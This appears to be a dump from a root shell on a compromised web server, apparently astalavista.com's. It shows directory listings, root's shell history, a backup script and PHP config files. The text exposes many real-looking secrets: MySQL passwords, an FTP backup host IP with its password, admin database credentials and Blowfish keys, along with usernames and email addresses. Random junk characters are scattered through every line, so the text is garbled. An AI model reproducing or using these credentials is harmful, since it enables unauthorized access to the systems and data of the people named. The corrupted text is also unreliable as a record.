7 C: I. Z) u! @4 A, M# Admin Contact - 链接标记support@secureservertech.com #7 f2 Q) y5 i q- z8 _( P- V
# #
t8 m8 ^, Y7 t, l* y4 S' D# Available ShortCuts #% ~+ o$ E" q+ P4 h2 D& y" [! v
# #
A8 n1 F" W. b8 ?* o9 \ l# nst - list active connections #! b0 V# R5 o& F# I( o
# ddos - shows how many times each ip is connected #
+ ~" D: Z+ I8 y+ |# ltr - restart the webserver #
, M0 j7 T; v# H7 ?# phpc - edit the php config file #) {& G& O* }( Q1 P7 h6 Z
# htc - edit the webserver configuration file #
$ ^) ~. |2 l: P, W! l5 W( b9 u# up - uptime #
0 [: p* V. d2 [: L3 ?# etd - edit the motd of the day file #! P0 \- j% ~3 F0 B* ^# O: @
# htr - start and restart apache if needed #+ Z+ c' R B7 j9 d, i, d
# syng - shows active SYN_RECV connections #
8 h( M/ }) L# u0 w2 H3 E7 H6 l# synd - syn flood blocker - “synd -h” for usage #
0 h6 I; c6 f e; V9 g#####################################################
' Q) S. j" U2 t R# NOTES: #
$ Y! a2 U( q3 i# \# Last Upgrade - 12-08-2008 by JF #6 q' |( t5 r& w# n
# My.cnf/Mysql Optimization - 1-28-09 #" Y! Y! x# ^% i% ` Y$ t
# #
5 |2 w, w4 O$ l4 [1 D& t6 m# #
" ]6 G% o- [( I t: ^# #1 ^/ Z; M6 O/ K, i2 ^9 z
#####################################################" U! R% u; A* w+ ^0 K) c6 f: u
& {% S2 Q5 \5 _5 ^& n
sh-3.2# lastlog | grep -v Never# m3 U7 m, a1 D) ?7 _, n Y9 C) V
Username Port From Latest( v. ~$ L* g7 B9 p" ^3 n9 |- m
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
- N' k5 X' `. l! |: T- dadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008" E" X6 W; E6 Q+ F. P
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
5 o9 F, Z, B9 P. T$ M9 b8 vastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20098 k! P3 Q& d1 z
% H" w% w6 A) w1 i& m. s
sh-3.2# ls -la
( A: u6 g* P( Z# ~; X( Ytotal 453376
0 {1 r5 z, M9 K+ C1 ]6 U; Z- Bdrwxr-x— 15 root root 4096 Jun 4 08:40 .
4 r$ m7 H( Z$ J0 T9 udrwxr-xr-x 25 root root 4096 Jun 3 02:43 .." _% c7 _4 J! d q0 L
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip! x6 D6 {! X& J P2 ]
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
, f+ q! i* T$ T/ N1 E3 q; W-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
: H0 V* C: W, n1 i6 K0 c-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout4 b! y. L& J! B! l
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
7 U, {8 u; h) p0 P% q% M& { j-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
$ R0 e# i, B6 [+ E7 u9 H7 }# y. Z-rwx—— 1 root root 1899 Oct 28 2007 bk.sh3 ?5 }2 d* P* v- i* N( S! }. l
-rw-r–r– 1 root root 1327 Nov 29 2007 cert- H5 F: p I7 X& H+ E; ]' m
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
( g5 Q! W2 R& Z8 W* H2 u2 Sdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
: M- f3 r- P3 C$ n-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc) p. p& p; H0 p+ [: V
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
, A2 J( k {6 ~3 [+ H4 @0 Edrwx—— 2 root root 4096 Oct 28 2007 .elinks6 o- `/ i( p' t3 l7 r; n1 E3 F
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
) B# C' m) x- M7 \( A-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
/ v4 W; o, o( J+ B/ Q& }5 o-rw——- 1 root root 0 Apr 16 13:19 .history
( p& G1 z# X. T" e3 O" e! D6 H: |-rw-r–r– 1 root root 16095 Sep 11 2007 install.log- o4 n, \* I3 t% {, r
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog2 n' Q% ?/ b5 c- s4 g& q6 B
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
# N1 \5 ` K8 K-rw——- 1 root root 35 Jun 2 14:23 .lesshst
& @" k# f( W9 z7 P/ _ P/ udrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp6 O8 \$ m5 x% `" ~# p9 g$ e
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec6 y J0 n; ]6 J: ?$ H
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz% R3 Y: o, k4 ^
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2& S. y7 y& \8 b4 _1 `% p; ]
-rwx—— 1 root root 760 Sep 18 2008 lp' u9 I/ Y: _" F
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.18 q0 k; ?4 S" S+ Y
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
& ?( c9 t' ]; S/ Y7 D3 t-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
: @' B& e& J" V# b' ^drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
& l; z$ H$ p9 z+ Q, A-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz6 l/ x9 x* g! w' x
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
" r4 T% K3 B3 f5 J-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz% c4 m) v- K, z( C
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
: N) N1 P$ T% K2 v( _" g$ {-rw——- 1 root root 41 Oct 19 2007 .my.cnf
& H$ E w% v1 t5 N1 p) s! w-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
# ~3 M% _9 L# F! S-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
- o- i) h b$ d6 J0 h) M( w3 P-rw——- 1 root root 41 May 20 2008 .mytop' J& V) y0 j2 X& V1 u0 B
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6( @ \0 B+ p2 u2 j' Q$ h
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
7 G: {" Y. h, s* Vdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp, @% f' K* l! q- {+ x" [9 p( M+ _
-rw——- 1 root root 1462 Sep 21 2007 opt.php
9 d! ~$ R3 Q% q8 F% h$ S- _-rw-r–r– 1 root root 3371 Sep 22 2007 p1 {$ X! D7 x4 O$ C" }6 N1 s; P9 X
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2" D" Y# G( q- A" G
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
5 a( y7 u& D0 a( n* z( n$ `7 O* M-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
" s% H" a* n& q" f2 W E5 u8 }-rw-r–r– 1 root root 887 Nov 28 2007 server.key5 L7 f- A, O# v! {1 O. H! \
drwx—— 2 root root 4096 Oct 10 2008 .ssh& k9 r; E$ z- V' {: l8 D9 {
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
& b- F+ B" f; k5 y3 I S-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc {: k5 I; T7 n) `, s; I
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip- ?$ s/ S# \& _4 g" O- ]) H0 X+ ?) V
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1! K* S% [7 O$ P
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
6 g% e2 _9 } y4 h' A( p/ j) n% e-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh: C$ N8 Z2 A) g0 b4 T K; G7 R
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.06 f$ q9 E; o$ i/ ?6 i
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz23 d7 [! V# P4 c" |+ k
-rw——- 1 root root 12997 May 16 2008 .viminfo
7 z. e6 Y/ q5 W" u; c9 }8 x5 F" u/ Y1 g3 X" I4 G& l1 w
sh-3.2# cat .bash_history
! ~4 Z; ~! }0 ~7 G7 W- N[snip]
' i1 f& h( K! n1 hwget cp4sst.com/sstlinux.tar.gz) b, Y9 K- _# |
tar zxvf sstlinux.tar.gz5 q* Z# B! w- u- ~, r
cd linux-2.6.27.101 t2 K) H1 p: j' @+ P/ j
sh install.sh
; V/ O! G! s9 f/ ~6 vmake bzImage ; make modules ; make modules_install ; make install& Y# J8 ^' v: Z; I1 n8 D [
make clean
. q# q/ b8 @8 Z! x$ D4 `service mysqld restart
# D: B# F5 d8 R[snip]
1 X& H1 ?5 d2 j' Ccd /usr/sbin/
9 i: s! \4 b- ^2 ?) ~, Y4 p1 \* Gchmod 4777 traceroute$ U6 w. u& y/ K. t: A) \
chmod 4777 ping
+ A/ {9 E e' n( z) K1 ~traceroute -I 链接标记[url]www.astalavista.ch[/url]# o R3 D7 t% I
[snip]
) f) O' u/ z @7 Gvi /etc/csf/csf.conf
4 z( O$ u) B7 E7 a- ftraceroute google.ch
0 P; k1 M$ Q7 Pservice csf restart. i% M' [5 C7 r0 L, Z: L
tracert google.ch
& N# ~) F9 W5 U g- yservice csf restart
' f& U' l' c8 X+ u" l- M" @+ ftraceroute 链接标记[url]www.google.ch[/url]0 l9 k% S5 {+ R+ x# y
tracert 链接标记[url]www.google.ch[/url]7 h+ N* |3 w, [6 b1 j/ v
traceroute 链接标记[url]www.google.ch[/url]: }( h, B$ ^+ J8 s5 }, k5 c
locate traceroute
( R+ L) Q0 b6 O) s8 V# D& Schown 4755 /bin/traceroute0 G; o2 Q+ P/ n- U
chown 4777 /bin/traceroute
: e u8 H( h5 {& c1 m) ?locate ping5 W' I2 q, A1 n0 D7 ]( f
chown 4755 /bin/ping
0 A9 h8 E# z# ~0 V3 M: u1 lchown 4777 /bin/ping, C5 I" ^. I5 `8 z8 J2 J0 O
cd /bin/
. n% S- M5 d0 R' v* k7 ^9 W8 F& Bls -ali | grep ping: b6 z6 g z2 d8 K r6 E
chown root ping
& S% i% \: {! S3 w% E3 ychmod 4755 ping/ W: z8 O; y+ e/ m8 p
ls -ali | grep traceroute
* H% e' @& s5 i- hchown root traceroute* W2 N. k4 `! {5 c! Q V
chmod 4755 traceroute/ V) _3 y% C/ [" I, v
ls -ali | grep traceroute$ c! C1 f( d, J9 U" K) a# ?% P
traceroute -I 链接标记[url]www.google.ch[/url]
9 D: l/ ~ N* r$ d ntraceroute 链接标记[url]www.google.ch[/url]
! ]9 o& i, l* U3 f) ^whois pmsantos.ch
% v t* X& P% S[snip]
9 {: I$ D) ^) r! [mysql -h com_contrexx2_live < /root/defaultp_ports.sql
! } K% H" p5 Mmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
% h; Q$ n7 I( l" b0 y: h; emysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
1 p$ @& @. ~+ F! Nmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql" U. \* V8 w9 E* @
top
1 ~5 L& o: I+ Dping ssth.ch6 X: o5 i6 N$ e# B+ L" A
ping asdlkfaljgasd???ljg???lasj.ch4 R8 n+ T3 C$ Q
ping asdlkfaljgasdlasj.ch
5 L( a F/ Q( |ping 链接标记[url]www.ssth.ch[/url]
- S# S# f. s$ b2 f, q; o5 Mping ssth.ch
! `. ~4 k* }; @; o7 pnslookup 链接标记[url]www.google.ch[/url]7 V* k5 a. n9 Z4 C; A* V+ d
nslookup 链接标记[url]www.ssth.ch[/url]9 Q( c4 ^# o/ D. E
man nslookup0 L- u* @1 }2 ^. A
ping 链接标记[url]www.google.ch[/url]
) ^* }) {# c: j, Lnslookup 链接标记[url]www.google.ch[/url]
% R) x8 S/ m( X" |* Lnslookup 链接标记[url]www.google.ch[/url]3 g! S( Y+ O! [* S3 x
nslookup salfjasdlf.ch. s) l& o% }; a
[snip]
2 ?1 k% I# H4 q" [# k* Q1 x* }8 qopenssl passwd -1 sadf. [. P* ^" j. {" s# _0 |
openssl passwd -1 5cZNHstdTy
% Z; h# R. w7 {. o- tmysql( g, `1 @. K' O/ h0 B' B
mysql
" Y/ p9 ^4 l; ?/ M' m, u* l- j. B7 \locate proftp
2 }. W6 H3 M) g" ]! Fvi /etc/proftpd.passwd* J* ^5 K7 T- j/ @/ u1 U3 q; O
service proftpd restart. f) U" F) I( ^
locate proftpd.conf
) {; L+ X( a- v# M2 A( r3 [vi /etc/proftpd.conf! ^ W; _2 w4 p& Q; A
vi /etc/proftpd.passwd
: H4 Z" n# p eservice proftpd restart
: r2 n+ m9 m5 R" c3 F[snip]# j* f: z, a# S8 u
/bin/sh /home/com/backup_system/backup.sh
+ C7 h" N- R- p otar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin& @4 h3 g+ Q" b9 G
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
9 b# `( I3 R) @' G; ~: I2 Fmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql7 F0 T( P9 X& Z, x) I. z* H+ s5 E. u
ls -ali; T9 l2 D6 S: v5 [6 [
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
& I. y$ @6 }0 J; A! P: p! z3 z1 V6 D u8 nmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql7 ]0 I6 _8 R" ?# P- Z5 t0 U; J
crontab -l+ @* n' S! f0 |9 g' T4 S8 f4 C
crontab -l, p' }5 y- W8 v& j8 g6 E: a9 y; C" i
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
: ]: { S: g5 A, p/home/com/public_html/modifications/cronjobs/exploits.sh2 S1 n9 `9 O$ C. J+ m
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
: ]# p% w& a6 Q2 z9 A8 E% K9 etar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
- K* x) m# n. ?" g* Xcd lsws-4.0.3
6 c$ H# e8 _* ~9 i& ^# r$ Dsh install.sh( [, F" j5 @/ ] h" r8 U# K
uptime
$ E; U3 _" ?4 S' F# _ [8 hhdparm -tt /dev/sda
# _6 H3 W; w3 z# _$ X0 Z; k/ p" Qiostat
1 P3 o1 C6 ^$ {0 l0 o: e& cyum install iostat" t, V+ Q/ l- G0 [' I6 v
iostat) { k, k% |! _5 M
whereis iostat
- s) H5 z9 q2 V( E/ Nyjm clean all1 l4 w5 _, V: x) u8 x( [
yum clean all ; yum -y update
1 {( u0 r u, m' M' @4 d, iiostat7 ^7 e6 f9 b' d1 E: ?1 H
yum install systat
0 H7 L# v$ d) w y! M+ z+ {0 K8 i: ~rpm -qa | grep iostat
$ o( S' w( H4 Y2 V. I2 U+ k% {rpm -qa | grep sysstat
1 E: S0 l$ N) F$ L# Q1 _* zrpm -qa | grep systat
8 ]9 Q6 @' c! D* N' Rdmesg -c
% E$ V8 u4 j) p. _7 m6 b6 Lsysctl -p; E% i! ?! b) I: h7 O6 @ Y) @
uname -r
, w5 l$ ^/ C- T( |4 w: s% s: scd /usr/src3 r. y5 s7 H1 c: i% p
wget nix101.com/kernels/sstlinux.tar.gz! }1 J% e# ]& c7 X) o9 ?+ l
shutdown -r now
$ @9 y$ o, a3 C/ u7 |nano -w /boot/grub/grub.conf7 w! T T+ A' X& z4 Z' Q8 M. ^
# t+ T! V8 F7 H9 R9 }. {sh-3.2# cat .my.cnf; o' i- ]- n3 O8 |: u
[client]& g9 f" E6 l0 l! m8 M
user=da_admin( N5 x# O, K: A \3 f3 L
password=X9dctmRH. |2 _- A8 e' D* @$ a: f% z
$ F6 J! {% e K5 |3 ?sh-3.2# cat /home/com/backup_system/backup.sh
8 }! G" H/ t5 w9 p#!/bin/sh
" J8 M; U# O3 o; r3 _! O2 j& I#####################################################################
6 p9 c% L: V$ [ x$ D# K# #, I5 b3 [6 e: B K: J4 P% O! z% q
# incremental backup for astalavista.com #
. y1 H9 ~6 p; N1 F4 j }$ E# #6 j- W; E. M7 a6 q* @
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
0 L. C7 a+ g2 O# J# Q$ b5 f5 s# #7 A, T. k4 I y: p
#####################################################################6 @6 }( o: w- l9 h1 p: Z: X" k
[snip]
8 I6 J( G/ m. v/ b2 u( |PROG_DIR=”/home/com/backup_system”;
. o' H, r: r! p; f0 }, G1 ~BACKUP_DIR=”/home/com/backups”;) ^5 _$ D: Z' s: U
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
: H; s5 [6 O" E8 j. \$ d& H# ftp for synology backup server6 _: ^. `% ]0 c$ G
FTP_HOST=”212.254.194.163″;
3 s2 m: g0 C/ ]FTP_PORT=”21″;
, T) ]( v& ^0 M; h* g* BFTP_USER=”astalavista.com”;
& a+ d- `* a: w% N% n$ i8 vFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;# S" R: ~4 A3 ` n
FTP_DIR=”/astalavista.com”;
2 L, d& q5 d( s3 f4 v# database$ p3 i) K2 p3 f% m
DB_HOST=”localhost”;. }3 Y, W5 |% ?9 t
DB_USER=”contrexxuser2″;' C9 a7 k. X/ I1 r' J* |
DB_PASS=”0fEYNZgXz1pKe”;
6 y. E- b! ?2 z+ XDB_DATABASE1=”com_contrexx2_live”;7 f* W9 f" \8 m) G3 W4 j
DB_DATABASE2=”com_contrexx2″;- W% l6 z1 c6 a: }* h- R
[snip]' Z- n7 ^6 g( f) ]
ftp -in $FTP_HOST $FTP_PORT <<EOF
9 |0 {2 \/ { Z1 N J& L5 E. Qquote USER $FTP_USER
* q9 w) U! Y: k. Mquote PASS $FTP_PASS5 L% ?. p0 M* t9 c: w, w
cd $FTP_DIR
) m7 k) u, O2 t. }. o! Mput $DB_FULLNAME-SQL_Dump.tar6 F* M: `- w, e2 u6 w5 l
put $BACKUP_FULLNAME-Public_HTML.tar
. O, }3 |, O0 y' ]- T8 L* ]4 f+ }7 e% pclose4 s" A! Z3 i# M# _* V" k
bye# p5 w$ P; m/ ?/ ~. h( _
EOF9 L: n5 a |8 v: t% m
8 Z8 q' d1 ^. Dsh-3.2# cd /home# D2 m2 F/ A% c8 h& P
sh-3.2# ls -la+ u8 X1 F0 M, f8 W' {# ^, Q2 k: ]
total 120
2 Y7 r5 L4 w5 y ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 .; j( j9 x q' q- b: B0 M0 `
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. o5 l* E h7 r8 v% R- R! [ Tdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
4 J9 C5 f7 ?# T! { R-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
" G0 o. A" U" K-rw——- 1 root root 8192 Jun 3 02:45 aquota.user# O- q/ R# g+ M6 s) |
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet3 ^* E$ _1 \( ]
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
1 r: _, x6 h8 }" W7 ^- Hdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141613 k+ T7 m3 n/ G1 D7 N
drwx–x–x 10 com com 4096 Apr 28 12:40 com
9 v. v( I! ~$ Hdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
9 Q- t# k- t; pdrwx—— 3 jon jon 4096 Sep 21 2007 jon/ y! l7 D) z% l* L( @% f
drwx—— 2 root root 16384 Sep 11 2007 lost+found) l/ Q& g: C1 A0 X% H; L' x
drwxr-xr-x 2 root root 4096 Sep 14 2007 my$ P+ c2 s: y( _2 Z9 A
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
7 x4 |# x. v9 Z7 e0 O2 u- hdrwx—— 2 jon jon 4096 Sep 15 2007 test
# c3 A6 h) A3 @drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
7 A+ U, d/ o4 P$ W' F8 s& T4 B, M8 c/ \: v0 O0 f
sh-3.2# cd admin: N* r0 x( L2 F+ H% ~
sh-3.2# ls -la& l! k9 ?7 K9 [9 M, G; h
total 1735896
5 B& `- V" {; s+ j- q! b3 Edrwx–x–x 9 admin admin 4096 Nov 28 2007 .
, g0 S( p/ R' K# Z. Z' ^5 c6 a1 pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: b2 T( e$ ^% C0 [/ a5 s- zdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
' ]- t' Y; o" A0 V' a8 b1 L T9 ^drwx—— 2 admin admin 4096 Sep 28 2007 backups; f" ?+ G% n1 r% H6 r) x+ ^8 G$ X& I
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history9 k9 j7 l, F/ O# O5 k/ x! v# V
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
# B# f* c6 f$ Y-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
) Q5 d3 Q+ k/ l# P/ ~6 {-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc* K4 S% i. T, a$ m9 s1 \3 `
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
# C# V6 Y% v) h, bdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
0 M6 O! }! F7 i5 J8 ?+ fdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
8 p4 M& Y& Y1 c; g% l4 p& J) s-rw-r–r– 1 root root 24 Sep 21 2007 info.php( v5 f9 e1 v6 x( M+ k: C
drwx—— 2 admin admin 4096 Sep 21 2007 mail
6 t/ R7 a: F; u. L$ e" q* S-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
. m, u6 D% y8 s* p9 _-rw-r–r– 1 root root 887 Nov 28 2007 server.key
1 d" u5 D( N# {9 N; S9 O-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow, L* \1 R* g& {# M4 ]6 F
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz" J2 F- X, d( `5 w* x
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups3 W) `% t" \" o8 k$ y4 w
2 A" S2 o3 K5 hsh-3.2# ../ `+ R/ r/ \+ `& ^2 R. X u* `
sh-3.2# cd jon
# H/ m5 Q1 ?4 P$ |sh-3.2# ls -la
; z, _. f! \3 i0 Etotal 36
" A- m: n4 y0 d9 Rdrwx—— 3 jon jon 4096 Sep 21 2007 .# e- a' a$ G# g% `- k/ _
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
P( w# I+ p& q6 R-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
3 a& }2 i, R+ U0 q-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout; x2 N/ @7 ]& X; K, f
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile" u& C; J, F$ x
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc" p3 g. M9 F4 M+ J. L) ]
-rw-r–r– 1 root root 24 Sep 21 2007 info.php3 |( O# b$ C( W8 O; }, P
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
, I2 x4 ~! L5 D, g3 a- f) n" ?8 r+ f8 s7 Y1 W/ z
sh-3.2# cd ..
, H( r" S+ X# k. m; w! J7 W8 j7 q" hsh-3.2# cd test4 \$ ~6 U; W, A4 }
sh-3.2# ls -la
. f7 x( H" B# r. g: D5 Vtotal 48
) Q3 h: p) t$ i1 O8 }drwx—— 2 jon jon 4096 Sep 15 2007 .$ d7 v5 s' O' j. d2 T
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..: E( ?+ }9 J! a5 Y3 O) O% h
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history4 k) F% ?' W/ g1 l6 v
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
5 h- G' ?! Z$ b/ K# v# Z7 v; J-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
5 B8 R2 p" I' s# C& P; J-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
5 ]5 p; n$ n& v8 l1 ssh-3.2# cat .bash_history
! l( m4 @+ h7 P9 o% I- k2 \/usr/bin/mysqladmin -u root password PoliuJhytg67
7 p( Q0 W* _) J- r4 [8 F/ |4 k/ N6 d3 P' }8 {6 o
sh-3.2# cd ..: n5 `' F* W' w7 A4 Q
sh-3.2# cd astanet
1 `" c/ j( C- l" [0 Psh-3.2# ls -la
1 M+ O' c% z2 a5 Z( |total 52
8 X8 h: R' h& a: a9 H8 [, Bdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
1 p& ~! @( E; o) Q% Kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 e& T! v+ W/ Z+ T! N+ D# b8 a hdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth+ g1 q; r7 {4 J4 x8 \3 y% R
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history, }1 T) f1 p1 Y5 Q$ ~' l) I' F
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
' G: }* @1 n6 G' x-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile3 d3 R7 M0 n" m& g t
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc7 n8 M) r7 z1 K/ ^. e" X
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains+ s- x7 ^5 c) u- k$ Z/ l! E7 K
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap7 f7 C% o- w. J, E2 |
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail- Z7 q5 ]$ U* q8 T y9 H* l# a
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history) s, ~3 p! q9 q- u9 X3 s
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
- C$ K& y& n7 S( d" d# a9 X% \3 k-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow% J$ g4 H* {$ A
# \* r" Q% ]( ^
sh-3.2# cd auth/8 o8 I+ h) }6 M. W
sh-3.2# ls -la
6 _, F; r4 E/ x: O1 p! }2 L* [total 28+ q' ^% k5 g& B) J' e
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
2 a0 s6 G w5 M- [drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..0 n3 p0 \ m' y, f. r' `
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
8 |2 a; X* x. E, v" H-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
7 O, P6 Y; ]9 C-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
9 x4 Z2 P, p7 w2 D& U- `$ [-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
7 p9 O9 E: W% A# i4 D5 m-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd* s2 }# S3 G# e3 B6 t! }
9 r B9 O' q0 `; [6 v. Z7 r1 Osh-3.2# cat hackercontest.config.inc.php
6 w! y6 b+ Y8 L8 E8 x7 O# K, R3 ~& V<?PHP
: f" F6 B( K" v& W0 C// Variabeln f?r Verbindung zur Datenbank /// H! ^5 z+ Q3 E8 F0 P) t
$conxHost = ‘localhost’; // MySQL hostname6 _! i- ?4 ^7 q3 M4 m3 Y0 F R( D
$conxUser = ‘hackercontest’; // MySQL user
4 a+ a. n( z4 {- W+ _& B7 [9 Y8 {$conxPassword = ‘K6m@7dUc’; // MySQL password/ m. g9 z/ z7 W# i) K
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish/ Y# r9 _- o% h: `& R, K# T, N
?>
" _# Z5 K1 L3 J: }sh-3.2# cat hosting.config.inc.php0 _) w+ g V8 x
<?PHP2 M, F3 _& [! ?% l1 ~' R& P3 r5 C K
// Variabeln f?r Verbindung zur Datenbank //
. F# B2 O0 t* S! f) n; H4 e2 q$conxHost = ‘localhost’; // MySQL hostname9 j! c3 B8 U, B0 C1 [
$conxUser = ‘hostinguser’; // MySQL user4 F: H2 P: ~) d4 A" u" U$ U
$conxPassword = ‘cXvB3981′; // MySQL password
5 V: I# s' ~* }5 G" ?$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish' o( n: K: d' p) k8 x3 \+ c3 Y0 B
?>
/ g; I$ T" M; n
( \# r1 a5 a- h- ~' Jsh-3.2# cd ..
/ k$ j! t7 s% [; i" C Bsh-3.2# cd com! e# q# W a$ {" j
sh-3.2# ls -la* n0 K' F+ ]+ K2 ^* V5 |- l2 A
total 141208
8 _1 a" V, I4 ^3 x/ C( fdrwx–x–x 10 com com 4096 Apr 28 12:40 .7 {) M; i: \+ F& a5 F
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
6 S; I! T& \* o X8 m# ]' Edrwx—— 2 com com 4096 Jun 4 04:04 backups
) c- s5 \' e$ s( r1 E, W- R" Y-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql' _. q5 X" H% J
